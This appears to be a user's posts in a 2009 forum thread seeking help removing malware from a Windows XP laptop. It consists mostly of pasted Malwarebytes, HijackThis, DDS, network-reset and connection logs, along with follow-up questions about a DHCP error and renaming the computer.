Infected: 9 Memory Processes Infected: C:\WINDOWS\system32\net.net (Trojan.Downloader) -> Unloaded process successfully. C:\Documents and Settings\user\Local Settings\temp\rasvsnet.tmp (Trojan.FakeAlert) -> Unloaded process successfully. C:\WINDOWS\msa.exe (Trojan.Agent) -> Unloaded process successfully. Memory Modules Infected: (No malicious items detected) Registry Keys Infected: HKEY_CURRENT_USER\SOFTWARE\NordBull (Malware.Trace) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\XML (Trojan.FakeAlert) -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\net (Trojan.Agent) -> Quarantined and deleted successfully. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UACd.sys (Trojan.Agent) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\poprock (Trojan.Downloader) -> Quarantined and deleted successfully. Registry Values Infected: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\net (Trojan.Downloader) -> Quarantined and deleted successfully. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\poprock (Trojan.Downloader) -> Quarantined and deleted successfully. Registry Data Items Infected: (No malicious items detected) Folders Infected: (No malicious items detected) Files Infected: C:\WINDOWS\system32\net.net (Trojan.Downloader) -> Quarantined and deleted successfully. C:\Documents and Settings\user\Local Settings\temp\rasvsnet.tmp (Trojan.FakeAlert) -> Quarantined and deleted successfully. C:\Documents and Settings\user\Local Settings\temp\UAC3ebf.tmp (Rootkit.TDSS) -> Delete on reboot. C:\Documents and Settings\user\Local Settings\temp\UAC3ecf.tmp (Rootkit.TDSS) -> Quarantined and deleted successfully. C:\Documents and Settings\user\Local Settings\temp\xomprqqowp.tmp (Rootkit.TDSS) -> Quarantined and deleted successfully. C:\WINDOWS\msa.exe (Trojan.Agent) -> Quarantined and deleted successfully. C:\WINDOWS\Tasks\{7B02EF0B-A410-4938-8480-9BA26420A627}.job (Trojan.Downloader) -> Quarantined and deleted successfully. C:\WINDOWS\Tasks\{BB65B0FB-5712-401b-B616-E69AC55E2757}.job (Trojan.Downloader) -> Quarantined and deleted successfully. C:\Documents and Settings\user\Local Settings\temp\d.exe (Trojan.Downloader) -> Delete on reboot. HijackThis log: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 04:26:57, on 29/09/2009 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16791) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\NoAds\NoAds.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\WINDOWS\system32\rundll32.exe C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing) O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing) O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing) O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing) O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe O4 - HKLM\..\Run: [TFNF5] TFNF5.exe O4 - HKLM\..\Run: [TPSMain] TPSMain.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8397 bytes Thanks again in advance for your help and I apologise for once more taking up your time. Regards.

Thank you for all of your help. It is greatly appreciated. I will save all the information in this thread for future use. A lot of the scanning tools that I used as previously directed, plus the ones you have just mentioned, will come in handy (I wouldn't use tools like ComboFix though unless especially directed). I was using XP's firewall because I didn't know of a good alternative. I am quite happy to buy one and I have used Norton in the past but will never use their software again as it is far too much of a burden on the computer. I will try the one you mentioned. One last thing. I have noticed on all of my DDS scans, when viewing Attach.txt, that there is some kind of IP address/DHCP error. It mentions a DHCPNACK message. I have seen this on all three logs. I did a quick Google search of this and it looks to be some kind of problem that needs looking into. Where would I go for this? Is it something I should notify my ISP about? Best regards.

The Toshiba references could simply be because the name of the laptop in Windows is set as "Toshiba". I never changed it. I don't have any auto-updates activated as far as I know (unless there is something doing it without my blessing). I even have Windows Updates switched off because I prefer to have control over what my PC is supposed to be doing and what my internet connection is doing. Therefore, those references to Toshiba may just be multiple connections. Is it worth changing the computer name under Windows, even if only temporarily, to something else so you can check? Will that cause any problems if I do change the name? I have run a new DDS scan. Once again I didn't get any requests for Optional Scans. I just click on the DDS.scr icon on Desktop, it brings up a DOS box and then eventually just shows two logs and a window saying what I should do with the log files. I didn't switch off my router this time, nor did I disable it via the Network Connection icon. In other words I was still connected to the internet when I did the scan. I did disable AVG 8.5 as always though. DDS.txt: DDS (Ver_09-07-30.01) - NTFSx86 Run by user at 23:58:52.03 on 21/09/2009 Internet Explorer: 7.0.5730.11 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.560 [GMT 1:00] AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} ============== Running Processes =============== C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\Program Files\NoAds\NoAds.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\Documents and Settings\user\Desktop\dds.scr ============== Pseudo HJT Report =============== uStart Page = hxxp://home.live.com/ uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchURL,(Default) = hxxp://www.google.com/search?q=%s BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\progra~1\spybot~1\SDHelper.dll BHO: SSVHelper Class: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:\program files\google\googletoolbar2.dll BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:\program files\google\googletoolbarnotifier\3.0.1225.9868\swg.dll TB: &Google: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\googletoolbar2.dll TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File uRun: [NoAds] "c:\program files\noads\NoAds.exe" uRun: [Mmm] "c:\program files\hace\mmm\Mmm.exe" uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [NeroCheck] c:\windows\system32\NeroCheck.exe mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\mbam.exe" /runcleanupscript StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~2.lnk - c:\program files\common files\microsoft shared\works shared\wkcalrem.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\startg~1.lnk - c:\program files\getright\GetRight.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\program files\java\jre1.6.0_07\bin\ssv.dll IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\progra~1\spybot~1\SDHelper.dll DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} - hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - hxxp://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1238014490265 DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jdk/6u7/jinstall-6u7-windows-i586-jc.cab?e=1222427383613&h=b8ac855f339f32209a0ec00ff741fe50/&filename=jinstall-6u7-windows-i586-jc.cab DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} - hxxp://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} - hxxp://crucial.com/controls/cpcScanner.cab DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab DPF: {D821DC4A-0814-435E-9820-661C543A4679} - hxxp://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll Notify: avgrsstarter - avgrsstx.dll Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll ============= SERVICES / DRIVERS =============== R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2008-6-19 335240] R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2008-6-19 27784] R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-5-24 53760] R2 avg8wd;AVG8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-2-2 297752] S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\drivers\smcwgu.sys --> c:\windows\system32\drivers\SMCWGU.sys [?] =============== Created Last 30 ================ 2009-09-20 20:25 <DIR> --d----- c:\documents and settings\user\DoctorWeb 2009-09-20 19:51 <DIR> --d----- c:\program files\CCleaner 2009-09-17 16:38 <DIR> --d----- c:\program files\ESET 2009-09-15 23:48 <DIR> a-dshr-- C:\cmdcons 2009-09-15 23:46 229,888 a------- c:\windows\PEV.exe 2009-09-15 23:46 161,792 a------- c:\windows\SWREG.exe 2009-09-15 23:46 98,816 a------- c:\windows\sed.exe 2009-09-13 03:38 38,224 a------- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 03:38 19,160 a------- c:\windows\system32\drivers\mbam.sys 2009-09-13 03:38 <DIR> --d----- c:\program files\Malwarebytes' Anti-Malware 2009-09-03 04:25 <DIR> --d----- c:\docume~1\user\applic~1\Malwarebytes 2009-09-03 04:25 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Malwarebytes 2009-08-31 22:37 <DIR> --d----- c:\program files\Trend Micro ==================== Find3M ==================== 2009-08-24 03:17 123 a------- C:\drmHeader.bin 2009-08-21 06:10 335,240 a------- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 06:10 11,952 a------- c:\windows\system32\avgrsstx.dll 2008-05-14 18:56 32,768 a--sh--- c:\windows\system32\config\systemprofile\local settings\history\history.ie5\mshist012008051420080515\index.dat ============= FINISH: 0:00:00.92 =============== Attach.txt is in the enclosed zip file. Thank you. Attach.zip

Sorry for the delay again. I wanted to write down the settings for a lot of the programs I use. Also, the latest scans took a long time due to the size of both of my hard drives. I was unsuccessful in uninstalling ComboFix with the u/ setting, most likely due to the fact that I deleted ComboFix from the Desktop each time after use. Therefore I had to manually delete the QooBox folder. I don't know if all the Run commands were successful as the DOS box would flash up too quickly. However, I did manage to get all of the log files, including drivestats. Here is resetlog.txt: reset SYSTEM\CurrentControlSet\Services\Dhcp\Parameters\Options\15\RegLocation old REG_MULTI_SZ = SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpDomain SYSTEM\CurrentControlSet\Services\TcpIp\Parameters\DhcpDomain reset SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{347E0056-1549-4BB2-AE29-89D6F5B1430C}\NameServerList old REG_MULTI_SZ = <empty> added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{347E0056-1549-4BB2-AE29-89D6F5B1430C}\NetbiosOptions reset SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{3C3A142A-09DF-451F-8D64-518AA076676C}\NameServerList old REG_MULTI_SZ = <empty> added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{3C3A142A-09DF-451F-8D64-518AA076676C}\NetbiosOptions reset SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{5F098EF5-5941-4552-A7E1-EC8B9ABF8A4A}\NameServerList old REG_MULTI_SZ = <empty> added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{5F098EF5-5941-4552-A7E1-EC8B9ABF8A4A}\NetbiosOptions added SYSTEM\CurrentControlSet\Services\Netbt\Parameters\Interfaces\Tcpip_{70827E7A-92BD-4B43-91A5-0C0730F7B3DB}\NetbiosOptions deleted SYSTEM\CurrentControlSet\Services\Netbt\Parameters\EnableLmhosts deleted SYSTEM\CurrentControlSet\Services\Netbt\Parameters\EnableProxy deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{347E0056-1549-4BB2-AE29-89D6F5B1430C}\NameServer deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{3C3A142A-09DF-451F-8D64-518AA076676C}\NameServer deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5F098EF5-5941-4552-A7E1-EC8B9ABF8A4A}\NameServer added SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\DisableDynamicUpdate deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\IpAutoconfigurationAddress deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\IpAutoconfigurationMask deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\IpAutoconfigurationSeed reset SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\RawIpAllowedProtocols old REG_MULTI_SZ = 0 reset SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\TcpAllowedPorts old REG_MULTI_SZ = 0 reset SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D7C19572-03C8-4CB6-BED2-3293F868D6A4}\UdpAllowedPorts old REG_MULTI_SZ = 0 deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DontAddDefaultGatewayDefault added SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\NameServer deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SearchList deleted SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\UseDomainNameDevolution reset Linkage\UpperBind for PCI\VEN_8086&DEV_103D&SUBSYS_00011179&REV_83\4&16793A72&0&40F0. bad value was: REG_MULTI_SZ = PSched reset Linkage\UpperBind for ROOT\MS_NDISWANIP\0000. bad value was: REG_MULTI_SZ = PSched <completed> Next is connections.txt: Active Connections Proto Local Address Foreign Address State TCP TOSHIBA:epmap TOSHIBA:0 LISTENING TCP TOSHIBA:microsoft-ds TOSHIBA:0 LISTENING TCP TOSHIBA:2869 TOSHIBA:0 LISTENING TCP TOSHIBA:10243 TOSHIBA:0 LISTENING TCP TOSHIBA:1028 TOSHIBA:0 LISTENING TCP TOSHIBA:netbios-ssn TOSHIBA:0 LISTENING TCP TOSHIBA:1107 webcluster2b.telenet-ops.be:http CLOSING UDP TOSHIBA:microsoft-ds *:* UDP TOSHIBA:isakmp *:* UDP TOSHIBA:4500 *:* UDP TOSHIBA:ntp *:* UDP TOSHIBA:1038 *:* UDP TOSHIBA:1089 *:* UDP TOSHIBA:1900 *:* UDP TOSHIBA:ntp *:* UDP TOSHIBA:netbios-ns *:* UDP TOSHIBA:netbios-dgm *:* UDP TOSHIBA:1900 *:* Next is drivestats.txt: File System Type : NTFS UserFileReads : 16445 UserFileReadBytes : 690338816 UserDiskReads : 17119 UserFileWrites : 2881 UserFileWriteBytes : 49274880 UserDiskWrites : 3002 MetaDataReads : 14905 MetaDataReadBytes : 98099200 MetaDataDiskReads : 16679 MetaDataWrites : 4878 MetaDataWriteBytes : 29663232 MetaDataDiskWrites : 5948 MftReads : 5416 MftReadBytes : 59232256 MftWrites : 4346 MftWriteBytes : 24420352 Mft2Writes : 1 Mft2WriteBytes : 4096 RootIndexReads : 0 RootIndexReadBytes : 0 RootIndexWrites : 0 RootIndexWriteBytes : 0 BitmapReads : 423 